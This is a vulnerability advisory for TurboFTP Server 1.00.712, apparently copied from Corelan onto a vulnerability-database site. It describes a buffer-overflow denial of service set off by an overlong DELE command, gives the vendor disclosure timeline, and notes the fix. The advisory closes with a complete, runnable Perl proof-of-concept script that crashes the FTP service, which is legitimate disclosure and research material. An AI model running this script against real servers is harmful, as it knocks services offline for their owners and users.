Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23049
HistoryJan 17, 2010 - 12:00 a.m.

[CORELAN-10-004] TurboFTP Server 1.00.712 remote DoS

2010-01-1700:00:00
vulners.com
86
JSON

|------------------------------------------------------------------|
| __ __ |
| _________ ________ / /___ _____ / /____ ____ _____ ___ |
| / / __ \/ / _ \/ / __ `/ __ \ / / _ \/ __ `/ __ ` \ |
| / // // / / / __/ / // / / / / / // __/ // / / / / / / |
| \/\// \//\,// // \/\/\__,// // // |
| |
| http://www.corelan.be:8800 |
| [email protected] |
| |
|-------------------------------------------------[ EIP Hunters ]–|
| |
| Vulnerability Disclosure Report |

Advisory : CORELAN-10-004
Disclosure date : Jan 12, 2010
Corelan Reference :
http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-004-turboftp-server-1-00-712-dos/

0x00 : Vulnerability information

[] Product : Turbo FTP Server
[] Version : 1.00.712
[] Vendor : turbosoft inc
[] URL : http://www.tbsoftinc.com
[] Platform : Windows
[] Type of vulnerability : Buffer overflow - DoS
[] Risk rating : Medium
[] Issue fixed in version : 1.00.720
[] Vulnerability discovered by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)
[] Greetings to : EdiStrosar, rick2600, mr_me, ekse & MarkoT from Corelan Team

0x01 : Vendor description of software

From the vendor website:

TurboFTP Server is a high performance, secure, scalable and management
friendly file transfer server running on Windows platforms. With it you
can easily set up a secure file transfer server that delivers regular FTP,
FTP over SSL/TLS, and SFTP over SSH services with virtual domains,
advanced directory access control, virtual folders, IP access control,
flexible authentication options and many other features.

0x02 : Vulnerability details

The "Turbo FTP Server" ftp service is vulnerable to a buffer overflow,
allowing a malicious person to trigger a Denial Of Service condition
against this service.

In order to trigger the vulnerability, the remote client needs to be able
to login and issue an specially crafted DELE command.

Note that other commands may be vulnerable too.

0x03 : Vendor communication

[] Dec 30, 2009 : Issue found
[] Jan 1st, 2010 : contacted vendor
[] Jan 1st, 2010 : vendor opened support ticket
[] Jan 4th, 2010 : vendor asked for PoC code
[] Jan 4th, 2010 : Poc Code sent
[] Jan 7th, 2010 : Vendor acknowledged issue and starts fixing issue
[] Jan 11th, 2010 : vendor released fixed version
[] Jan 12th, 2010 : Public disclosure

Release notes (on Vendor website):

V 1.00 Build 720 - Jan 11, 2010

[-] Buffer overflow problems reported by Corelan Team.
[-] A file open problem causing WinSCP failed to upload files.
[-] A problem in log recycling causes server to stall.

0x04 : Exploit/PoC

Exploit Title : TurboFTP Server 1.00.712 Remote DoS

Date : 30 december 2009

Author : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)

Bug found by : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)

Software Link : http://www.tbsoftinc.com/download/tbftpsrv.exe

Version : 1.00.712

Issue fixed in: 1.00.720

OS : Windows

Tested on : XP SP3 En (VirtualBox)

Type of vuln : DoS

Greetz to : Corelan Security Team::EdiStrosar/Ricks2600/MarkoT/mr_me/ekse

Script provided 'as is', without any warranty.

Use for educational purposes only.

Code :

print "|------------------------------------------------------------------|\n";
print "| __ __ |\n";
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n";
print "| / / __ \\/ / _ \\/ / __ `/ __ \\ / / _ \\/ __ `/ __ ` \\ |\n";
print "| / // // / / / __/ / // / / / / / // __/ // / / / / / / |\n";
print "| \\/\\// \\//\\,// // \\/\\/\\__,// // // |\n";
print "| |\n";
print "| http://www.corelan.be:8800 |\n";
print "| |\n";
print "|-------------------------------------------------[ EIP Hunters ]–|\n\n";
print "[+] DoS exploit for TurboFTP Server 1.00.712 \n";

use IO::Socket;

if ($#ARGV ne 3) {
print "\n usage: $0 <targetip> <targetport> <user> <password>\n";
exit(0);
}

my $user=$ARGV[2];
my $pass=$ARGV[3];

print " [+] Preparing DoS payload\n";
my $payload = "A" x 2000;
print " [+] Connecting to server $ARGV[0] on port $ARGV[1]\n";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => 'tcp');

$ftp = <$sock> || die " [!] *** Unable to connect***\n";
print " ** $ftp";
$ftp = <$sock>;
print " ** $ftp";
print " [+] Logging in (user $user)\n";
print $sock "USER $user\r\n";
$ftp = <$sock>;
print " ** $ftp";
print $sock "PASS $pass\r\n";
$ftp = <$sock>;
print " ** $ftp";
print " [+] Sending payload\n";
print $sock "DELE ".$payload."\r\n";
$ftp = <$sock>;
print " ** $ftp";
print " [+] Payload sent, now checking FTP server state\n";
$sock2 = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => 'tcp');
my $ftp2 = <$sock2> || die " [+] DoS successful\n";
print " [!] DoS did not seem to work\n";
print " ** $ftp2\n";

JSON